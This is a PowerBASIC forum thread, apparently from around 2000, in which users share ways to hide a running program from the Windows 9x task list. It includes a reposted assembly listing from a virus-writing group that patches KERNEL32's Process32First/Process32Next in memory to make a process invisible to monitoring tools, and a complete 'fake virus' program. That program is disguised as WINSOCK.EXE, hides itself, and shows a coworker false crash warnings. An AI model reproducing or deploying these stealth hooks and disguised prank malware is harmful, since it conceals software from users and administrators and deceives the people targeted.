No announcement yet.

Working way to hide a Prog?!?

  • Filter
  • Time
  • Show
Clear All
new posts

  • Working way to hide a Prog?!?

    Hi all,
    I'm searching for a working way to hide an PowerBASIC app in the Taskmanager (CTRL+ALT+DEL). The way's I tried (with RegisterProcess) didn't work



  • #2
    Under Win9x, use:
       RegisterServiceProcess(GetCurrentProcessID, Action&)
    with Action& = 1 to register, 0 to unregister.
    For NT/2000, you need to write a service.

    -- Greg
    [email protected]


    • #3
      this is possibly off-topic to Sven's question but may be of interest to a few of the serious hackers here... at Iczelion's site there is a link to
      "Hide process from tools that use toolhelp32 apis, Process32First and Process32Next by patching them in memory. Windows 9x-specific."
      the docs indicate it is tasm32 source, here's the crux of it:
      ;HIDEPROC - Stealth W9x process
      ;(c) Vecna 2000
      ;This program hook Process32First and Process32Next, hiding the EXPLORER.EXE
      ;process. These KERNEL32 APIs are patched in memory, and redirected to our
      ;code, that reside in the slack (difference between virtual and physical) of
      ;the sections of KERNEL32.
      ;This patch make the selected process invisible to tools like PROCDUMP and
      ;like. Adding this tech to a prog that already hide itself in CTRL+ALT+DEL
      ;list make it full invisible.
      .model flat
      ofs equ offset
      by  equ byte ptr
      wo  equ word ptr
      dwo equ dword ptr
      include                          ;29A inc files
      include    ;all include files are in the zip
      titulo db "HIDEPROC - Stealth W9x process", 0
      msg1   db "KERNEL32 already patched", 0
      msg2   db "KERNEL32 has not available space for our code", 0
      msg3   db "KERNEL32 patched", 0
      dll    db "kernel32.dll", 0
      api001 db "Process32First", 0
      api002 db "Process32Next", 0
      vxdcall0 dd 0
             call swap_p32f
             push dwo [esp+8]                 ;buffer
             push dwo [esp+8]                 ;snapshot
             call _p32f
             test eax, eax
             jz @@error                       ;wasnt sucessful...
             call check_name
             jnz @@error
             call swap_p32f
             push dwo [esp+8]                 ;yeahh, stealth it!
             push dwo [esp+8]
             call p32n_entry
             ret 2*4
             call swap_p32f
             ret 2*4
             call swap_p32n
             push dwo [esp+8]                 ;buffer
             push dwo [esp+8]                 ;snapshot
             call _p32n
             test eax, eax
             jz @@error                       ;wasnt sucessful...
             call check_name
             jz @@retry                       ;yep, get next
             call swap_p32n
             ret 2*4
             mov ebp, [esp+(8*4)+8+4]
             lea esi, [ebp.szExeFile]         ;get process name
             test al, al
             jnz @@go_end
             mov eax, [esi-9]
             or eax, 20202020h
             cmp eax, "rero"                  ;is *orer.??? (EXPLORER.EXE)
             mov eax, 12345678h
           org $-4
        p32f dd 0
             jmp eax
             mov eax, 12345678h
           org $-4
        p32n dd 0
             jmp eax
             call @@delta
             pop ebp
             sub ebp, ofs @@delta-IMPLANT
             push esi edi ebp
             call delta
             lea esi, [ebp+(ofs p32f_code-IMPLANT)]
             mov edi, [ebp+(ofs p32f-IMPLANT)]
             call swap                        ;Process32First
             pop ebp edi esi
             push esi edi ebp
             call delta
             lea esi, [ebp+(ofs p32n_code-IMPLANT)]
             mov edi, [ebp+(ofs p32n-IMPLANT)]
             call swap                        ;Process32Next
             pop ebp edi esi
             mov eax, [edi]
             xchg [esi], eax
             mov [edi], eax
             mov al, [edi+4]                  ;swap 5-byte buffers
             xchg [esi+4], al
             mov [edi+4], al
      p32n_code db 5 dup (0)
      p32f_code db 5 dup (0)
      extrn GetProcAddress:PROC
      extrn ExitProcess:PROC
      extrn GetModuleHandleA:PROC
      extrn MessageBoxA:PROC
      extrn GetCurrentProcess:PROC
      extrn VirtualProtect:PROC
      extrn GetLastError:PROC
      extrn FormatMessageA:PROC
             db "(c) Vecna 2000", 0
             mov eax, [esp+(8*4)+4]
             and eax, 0fffff000h
             ror eax, 12                      ;convert address
             push 020060000h
             push 00h
             push 01h
             push eax
             push 001000dh                    ;_PageModifyPermissions
             mov eax, [vxdcall0]
             call eax
             ret 4
             push ofs dll
             call GetModuleHandleA            ;get address of kernel32
             mov ebx, eax
             push ofs api001
             push ebx
             call GetProcAddress              ;init APIs weïll hook
             mov [p32f], eax
             push ofs api002
             push ebx
             call GetProcAddress
             mov [p32n], eax
             mov eax, [ebx.MZ_lfanew]
             lea edi, [eax.ebx-4]
             cmp dwo [edi], -1
             jne @@patch_sys                  ;kernel32 is already patched?
             push 0
             push ofs titulo
             push ofs msg1                    ;show msg and exit...
             push 0
             call MessageBoxA
             jmp @@error
             mov esi, [edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export. \
             mov esi, [esi.ebx.ED_AddressOfFunctions]
             mov ecx, [esi.ebx]
             add ecx, ebx
             mov [vxdcall0], ecx              ;get VxDCall0 entry
             push edi
             call deprotect
             mov dwo [edi], -1
             movzx ecx, wo [eax.ebx.NT_FileHeader.FH_NumberOfSections]
             lea esi, [eax.ebx+SIZE IMAGE_NT_HEADERS]
             mov eax, [esi.SH_Characteristics]
             jne @@next_section
             mov eax, [esi.SH_SizeOfRawData]
             mov edi, [esi.SH_VirtualSize]
             sub eax, edi
             cmp eax, IMPLANT_SIZE            ;section has a slack big enougth
             jb @@next_section
             add edi, [esi.SH_VirtualAddress]
             add edi, ebx                     ;edi=where write our code
             jmp @@copy_code
             add esi, IMAGE_SIZEOF_SECTION_HEADER
             loop @@section_loop
             push 0
             push ofs titulo                  ;no section can hold us
             push ofs msg2                    ;show msg and exit...
             push 0
             call MessageBoxA
             jmp @@error
             mov ebp, edi
             mov esi, ofs IMPLANT
             mov ecx, IMPLANT_SIZE
             rep movsb                        ;copy implant code to kernel32 mem
             mov edi, [p32f]
             lea esi, [ebp+(ofs p32f_code-ofs IMPLANT)]
             call @@patch
             mov eax, ebp
             sub eax, edi
             mov [edi-4], eax                 ;redirect it to our code
             mov edi, [p32n]
             lea esi, [ebp+(ofs p32n_code-ofs IMPLANT)]
             call @@patch
             lea eax, [ebp+(ofs p32n_entry-ofs IMPLANT)]
             sub eax, edi
             mov [edi-4], eax                 ;redirect it to our code
             push 0
             push ofs titulo
             push ofs msg3
             push 0
             call MessageBoxA
             push 0
             call ExitProcess
             push edi
             xchg esi, edi
             mov edi, [esp]
             call deprotect
             mov al, 0e9h                     ;build JMP
      end    install
      no idea if it's PBable or not



      • #4
        I've also tried this before and I became an error Message like "Missing Shortcut to a export Kernel function: REGISTERSERVICEPROCESS" (<- translated 'cause I've a german Windows version [Win 98 SE]).

        Can you give me a piece of example code, which works? Or do you know another way?


        I know Iczlion's Win32ASM Homepage and I also looked at this. Nice source, anyway!


        For hiding my App, I also found a source a Iczion's Homepage:
        But I can't get it running under PowerBASIC, 'cause it's MASM. And I don't know how to "translate" the "invoke" into TASM (with "push"?!?)

        (sorry, but I'm using Linux and I can't copy & paste a text in a Web-Formular under Mozilla *g*)



        • #5
          Sven --
          Under 9x
             Declare Function RegisterServiceProcess(ByVal dwProcessId As Dword, ByVal dwType As Dword) As Dword
             Function ShowHide (dwType As Dword) As Long
                Dim hProc As Dword, lResult As Long
                hProc = GetProcAddress(LoadLibrary ("Kernel32.Dll"), "RegisterServiceProcess")
                If hProc Then Call Dword hProc Using RegisterServiceProcess (GetCurrentProcessId, dwType) To lResult
                Function = lResult
             End Function
          Usage: ShowHide 1 (hide) or ShowHide 0 (unhide]

          E-MAIL: [email protected]


          • #6

            This is something that I used to play a practical joke on a fellow
            employee. This person knows zero about Windows OS itself, she deletes
            DLL's because she says they take up space on her hard drive.

            I did this because I was trying to deter her from playing games, by
            prompting her with a "if you continue to play games, your hard disk will crash!"

            Well, it was obvious that games were more important than work, so by
            the second day of the joke, she had a 'print-screen' copy of my
            bitmap (she had figured out the duration of the timers exactly). Then
            She went on a search and destroy mission and completely scr***d the
            computer up.

            We had to send it around the corner to the "Intelligent Computer" guys to fix it.
            And yes not a word, in shame, I kept a low profile for the next several weeks. Eeeeks!


            ' Annoying Fake Virus
            ' Compiler: PBDLL60
            ' May 30, 2000
            ' Anti-Gamming Warning, "The Work Loss Specialist"
            $Compile Exe  "WINSOCK.EXE"    '*Give it a fake name
            $Include      "WIN32API.INC"
            $Resource     "AVIRUS.PBR"
            '* Hide process from task list equates
            %RSP_SIMPLE_SERVICE = 1
            '* Hide process from task list function
            DECLARE FUNCTION RegisterServiceProcess Lib "kernel32" _
                             Alias "RegisterServiceProcess" _
                            (ByVal dwProcessID As Long, _
                             ByVal dwType As Long ) As Long
            '        <<Hide a process from the Task List>>
            '   To hide in tasklist = 0
            '   To show in tasklist = 1
            Sub ShowInTasklist( ByVal OnOff As Long )
                Dim pid As Long
                pid = GetCurrentProcessId()
                If OnOff Then
                    RegisterServiceProcess pid, %RSP_UNREGISTER_SERVICE
                    RegisterServiceProcess pid, %RSP_SIMPLE_SERVICE
                End If
            End Sub
            Global ghInstance As Long
            Global TimeTable() AS Long
            %ID_TIMER  = 1      'Wait and display window timer
            %ID_TIMER2 = 2      'Display and hide timer
            '                         <<WinMain>>
            Function WinMain (ByVal hInstance As Long, _
                              ByVal hPrevInstance As Long, _
                              lpCmdLine As Asciiz Ptr, _
                              ByVal iCmdShow As Long) As Long
            Local Msg As tagMsg
            Local wndclass As WndClassEx
            Local szAppName As Asciiz * 80
            Local hWnd As Long
            DIM TimeTable(1:10)
            ghInstance = hInstance
            szAppName = "AVIRUS"
            If FindWindow(szAppName ,szAppName) Then Exit Function
            wndclass.cbSize = SizeOf(WndClass)
            wndclass.lpfnWndProc = CODEPTR( WndProc )
            wndclass.cbClsExtra = 0
            wndclass.cbWndExtra = 0
            wndclass.hInstance = hInstance
            wndclass.hIcon = LoadIcon (hInstance, "WINICO")
            wndclass.hCursor = LoadCursor( %NULL, ByVal %IDC_ARROW)
            wndclass.hbrBackground = GetStockObject(%LTGRAY_BRUSH)
            wndclass.lpszMenuName = %NULL
            wndclass.lpszClassName = VarPtr( szAppName )
            wndclass.hIconSm = LoadIcon( hInstance,"WINICO")
            RegisterClassEx wndclass
            '*Get the handle of an existing window and pass this on as the
            ' parent to this window so we can hide our process from showing
            ' up on the task bar
            'hdTopWnd& = GetDeskTopWindow()
             hNextWnd& = GetTopWindow(hPrevWnd&)
             hParent&  = GetParent(hNextWnd&)
            'hParent& = %NULL
            hWnd = CreateWindowEx(0,szAppName, _
                                  "", _
                                  %WS_POPUP OR %WS_DLGFRAME,_
                                  %CW_USEDEFAULT, _
                                  %CW_USEDEFAULT, _
                                  %CW_USEDEFAULT, _
                                  %CW_USEDEFAULT, _
                                  hParent&, _ '<-- assign to a parent window
                                  %NULL, _
                                  hInstance, _
                                  ByVal %NULL)
            '*Hook timer for one interval
            If IsFalse(SetTimer(hWnd ,%ID_TIMER ,150000 ,%NULL)) Then
            Exit Function
            End If
            'ShowWindow hWnd, iCmdShow
            UpdateWindow hWnd
            '*Hide it from the Task List manager
            Call ShowInTasklist(0)
            While GetMessage(Msg, %NULL, 0, 0)
             TranslateMessage Msg
             DispatchMessage Msg
            Function = Msg.wParam
            End Function
            '                  <<Main Window Procedure>>
            Function WndProc (ByVal hWnd As Long, ByVal wMsg As Long, _
            ByVal wParam As Long, ByVal lParam As Long) Export As Long
            Local   hDC     As Long
            Local   hMemDc  As Long
            Local   Ps      As PaintStruct
            Local   hBitMap As Long
            Local   nBitMap As Asciiz * 80
            Local   Bm      As BITMAP
            Local   Tmp     As Long
            Static  Rc      As RECT     'preserve x,y window coordinates
            Static  Cntr    As Long     'preserve base timer Counter
            Static  nRep    As Long     'preserve repeat counter
            Static  tc      As Long     'preserve time table counter
            Local szWarning As Asciiz*255
            'Local MainProgCaption As Asciiz * 80
            'Local MainProgClass As Asciiz * 80
            nBitMap = "AVIRUS" 'Name of bitmap in pbr file
            Select Case wMsg
            Case %WM_CREATE
                '*resize window to snuggly fit the bitmap,
                ' and center it and make it topmost
                hBitMap = LoadBitmap (ghInstance ,nBitMap)
                GetObject hBitMap ,Len(Bm) ,Bm
                Rc.nLeft =(GetSystemMetrics(%SM_CXSCREEN) - Bm.bmWidth) / 2
                Rc.nTop = (GetSystemMetrics(%SM_CYSCREEN) - Bm.bmHeight) / 2
                SetWindowPos hWnd ,%HWND_TOPMOST ,Rc.nLeft ,Rc.nTop ,Bm.bmWidth ,Bm.BmHeight ,0
                DeleteObject hBitMap
                TimeTable(1)  = 300000
                TimeTable(2)  = 200000
                TimeTable(3)  = 500000
                TimeTable(4)  = 250000
                TimeTable(5)  = 80000
                TimeTable(6)  = 400000
                TimeTable(7)  = 140000
                TimeTable(8)  = 357000
                TimeTable(9)  = 25000
                TimeTable(10) = 780000
            Case %WM_PAINT
                'Paint bitmap on window
                hBitMap = LoadBitmap (ghInstance ,nBitMap)
                GetObject hBitMap ,Len(Bm) ,Bm
                hDc = BeginPaint(hWnd ,Ps)
                hMemDc = CreateCompatibleDc(hDc)
                SelectObject hMemDc ,hBitMap
                BitBlt hDc ,0 ,0 ,Bm.bmWidth ,Bm.bmHeight ,hMemDc ,0 ,0 ,%SRCCOPY
                DeleteDc hMemDc
                EndPaint hWnd ,Ps
                DeleteObject hBitMap
                Function = 0
                Exit Function
            Case %WM_TIMER
                Incr Cntr 'repeat base timer counter
                If %ID_TIMER2 <> wParam THEN
                    If nRep = 100 Then  'Exit program
                        SendMessage hWnd ,%WM_DESTROY ,%NULL ,%NULL
                    End If
                End if
                '* The process is hidding until we reach the desired
                '  time, say approx every 10 minutes. Once we reach it,
                '  we display the "Virus Warning" window.
                If Cntr = 3 Then
                    SetWindowPos hWnd,%HWND_TOPMOST,Rc.nLeft ,Rc.nTop,0,0,%SWP_NOSIZE
                    OpenClipboard hWnd
                    ShowWindow hWnd,%SW_SHOW
                    KillTimer hWnd ,%ID_TIMER
                    SetTimer hWnd ,%ID_TIMER2 ,1500 ,%NULL
                End If
                '* Let's display it for a few seconds, then exit automatically
                '  or when the OK button is pressed.
                If %ID_TIMER2 = wParam THEN
                    If Cntr >= 5 Then
                        KillTimer hWnd, %ID_TIMER2
                        ShowWindow hWnd, %SW_HIDE
                        Incr nRep                               'update number of repeats
                        Cntr = 0                                'clear counter
                        Incr tc
                        If tc > 10 then tc = 1
                        SetTimer hWnd ,%ID_TIMER ,TimeTable(tc) ,%NULL   'reset the timer
                        '*maybe add a random timer generator and
                        ' add random warning strings.
                    End If
                End If
            Case %WM_LBUTTONDOWN
                 SendMessage hWnd ,%WM_DESTROY ,%NULL ,%NULL
                 'KillTimer hWnd, %ID_TIMER2
                 'ShowWindow hWnd, %SW_HIDE
                 'Incr nRep
                 'Cntr = 0
                 'SetTimer hWnd ,%ID_TIMER ,1000 ,%NULL
                 Function = 0
                 Exit Function
            Case %WM_DESTROY
                KillTimer hWnd ,%ID_TIMER
                KillTimer hWnd ,%ID_TIMER2
                PostQuitMessage 0
                Function = 0
                Exit Function
            End Select
            Function = DefWindowProc(hWnd, wMsg, wParam, lParam)
            End Function